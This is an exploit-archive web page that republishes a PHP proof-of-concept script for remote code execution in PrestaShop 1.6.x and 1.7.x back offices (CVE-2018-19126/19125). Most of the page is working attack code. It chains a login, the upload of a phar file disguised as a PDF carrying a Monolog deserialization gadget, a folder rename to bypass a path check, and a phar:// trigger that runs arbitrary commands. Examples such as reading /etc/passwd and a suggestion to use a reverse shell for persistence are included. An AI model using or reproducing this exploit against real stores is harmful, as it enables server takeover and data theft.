首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
PrestaShop 1.6.x / 1.7.x Remote Code Execution
来源:https://github.com/farisv 作者:farisv 发布时间:2018-12-12  
<?php
/**
 * 
 * PrestaShop 1.6.x <= 1.6.1.23 & 1.7.x <= 1.7.4.4 - Back Office Remote Code Execution
 * See https://github.com/farisv/PrestaShop-CVE-2018-19126 for explanation.
 * 
 * Chaining multiple vulnerabilities to trigger deserialization via phar.
 *
 * Date:
 *   December 1st, 2018
 *
 * Author:
 *   farisv
 *
 * Vendor Homepage:
 *   https://www.prestashop.com/
 *
 * Vulnerable Package Link:
 *   https://assets.prestashop2.com/en/system/files/ps_releases/prestashop_1.7.4.3.zip
 *
 * CVE :
 *   - CVE-2018-19126
 *   - CVE-2018-19125
 * 
 * Prerequisite:
 *   - PrestaShop 1.6.x before 1.6.1.23 or 1.7.x before 1.7.4.4.
 *   - Back Office account (logistician, translator, salesman, etc.).
 * 
 * Usage:
 *   php exploit.php back-office-url email password func param
 * 
 * Example:
 *   php exploit.php http://127.0.0.1/admin-dev/ salesman@shop.com 54l35m4n123
 *   system 'cat /etc/passwd'
 * 
 * Note:
 * Note that the upload directory will be renamed and you can't upload the
 * malicious phar file again if the folder name is not reverted. You might want
 * to execute reverse shell to gain persistence RCE or include the command to
 * rename the folder again in your payload (you need to know the path to the
 * upload directory).
 * 
 * FOR EDUCATIONAL PURPOSES ONLY. DO NOT USE THIS SCRIPT FOR ILLEGAL ACTIVITIES.
 * THE AUTHOR IS NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE.
 * 
 */

namespace PrestaShopRCE {

    class Exploit {
        private $url;
        private $email;
        private $passwd;
        private $cmd;
        private $func;
        private $param;

        public function __construct($url, $email, $passwd, $func, $param) {
            $this->url = $url;
            $this->email = $email;
            $this->passwd = $passwd;
            $this->func = $func;
            $this->param = $param;
        }

        private function post($path, $data, $cookie) {
            $curl_handle = curl_init();
            
            $options = array(
                CURLOPT_URL => $this->url . $path,
                CURLOPT_HEADER => true,
                CURLOPT_POST => 1,
                CURLOPT_POSTFIELDS => $data,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_COOKIE => $cookie
            );
            
            curl_setopt_array($curl_handle, $options);
            $raw = curl_exec($curl_handle);
            curl_close($curl_handle);

            return $raw;
        }

        private function fetch_cookie($raw) {
            $header = "Set-Cookie: ";
            $cookie_header_start = strpos($raw, $header);
            $sliced_part = substr($raw, $cookie_header_start + strlen($header));
            $cookie = substr($sliced_part, 0, strpos($sliced_part, ';'));
            return $cookie;
        }

        public function run() {

            // Login and get PrestaShop cookie
            $data = array(
                'email' => $this->email,
                'passwd' => $this->passwd,
                'submitLogin' => '1',
                'controller' => 'AdminLogin',
                'ajax' => '1'
            );
            $cookie = "";
            $raw = $this->post('/', $data, $cookie);
            $prestashop_cookie = $this->fetch_cookie($raw);

            // Get FileManager cookie
            $data = array();
            $cookie = $prestashop_cookie;
            $raw = $this->post('/filemanager/dialog.php', $data, $cookie);
            $filemanager_cookie = $this->fetch_cookie($raw);

            // Craft deserialization gadget
            $gadget = new \Monolog\Handler\SyslogUdpHandler(
                new \Monolog\Handler\BufferHandler(
                    ['current', $this->func],
                    [$this->param, 'level' => null]
                )
            );

            // Craft malicious phar file
            $phar = new \Phar('phar.phar');
            $phar->startBuffering();
            $phar->addFromString('test', 'test');
            $phar->setStub('<?php __HALT_COMPILER(); ? >');
            $phar->setMetadata($gadget);
            $phar->stopBuffering();

            // Change the extension
            rename('phar.phar', 'phar.pdf');

            // Cookie for next requests
            $cookie = "$prestashop_cookie; $filemanager_cookie";

            // Upload phar.pdf
            $curl_file = new \CurlFile('phar.pdf', 'application/pdf', 'phar.pdf');
            $data = array(
                'file' => $curl_file
            );
            $raw = $this->post('/filemanager/upload.php', $data, $cookie);

            // Rename image directory to bypass realpath() check
            $data = array(
                'name' => 'renamed'
            );
            $raw = $this->post(
                '/filemanager/execute.php?action=rename_folder',
                $data,
                $cookie
            );

            // Trigger deserialization
            // The '/img/cms/' substring is important to bypass string check
            $data = array(
                'path' => 'phar://../../img/renamed/phar.pdf/img/cms/'
            );
            $raw = $this->post(
                '/filemanager/ajax_calls.php?action=image_size',
                $data,
                $cookie
            );

            // Display the raw result
            print $raw;

        }
    }

}

/*
 * Based on
 * https://github.com/ambionics/phpggc/blob/master/gadgetchains/Monolog/RCE/1/
*/
namespace Monolog\Handler {

    class SyslogUdpHandler {
        protected $socket;

        function __construct($param) {
            $this->socket = $param;
        }
    }

    class BufferHandler {
        protected $handler;
        protected $bufferSize = -1;
        protected $buffer;
        protected $level = null;
        protected $initialized = true;
        protected $bufferLimit = -1;
        protected $processors;

        function __construct($methods, $command) {
            $this->processors = $methods;
            $this->buffer = [$command];
            $this->handler = clone $this;
        }
    }

}

namespace {

    if (count($argv) != 6) {
        $hint = "Usage:\n  php $argv[0] back-office-url email password func param\n\n";
        $hint .= "Example:\n  php $argv[0] http://127.0.0.1/admin-dev/ ";
        $hint .= "salesman@shop.com 54l35m4n123 system 'uname -a'";
        die($hint);
    }

    if (!extension_loaded('curl')) {
        die('Need php-curl');
    }

    $url = $argv[1];
    $email = $argv[2];
    $passwd = $argv[3];
    $func = $argv[4];
    $param = $argv[5];

    $exploit = new PrestaShopRCE\Exploit($url, $email, $passwd, $func, $param);
    $exploit->run();

}
            


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
  相关文章
·SmartFTP Client 9.0.2623.0 Den
·WordPress Snap Creek Duplicato
·LanSpy 2.0.1.159 Buffer Overfl
·WebDAV Server Serving DLL
·Linux userfaultfd tmpfs File P
·WebKit JIT Proxy Object Issue
·Windows UAC Protection Bypass
·CyberLink LabelPrint 2.5 Stack
·Safari Proxy Object Type Confu
·Google Chrome 70.0.3538.77 Cro
·UltraISO 9.7.1.3519 Output Fil
·XNU POSIX Shared Memory Mappin
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved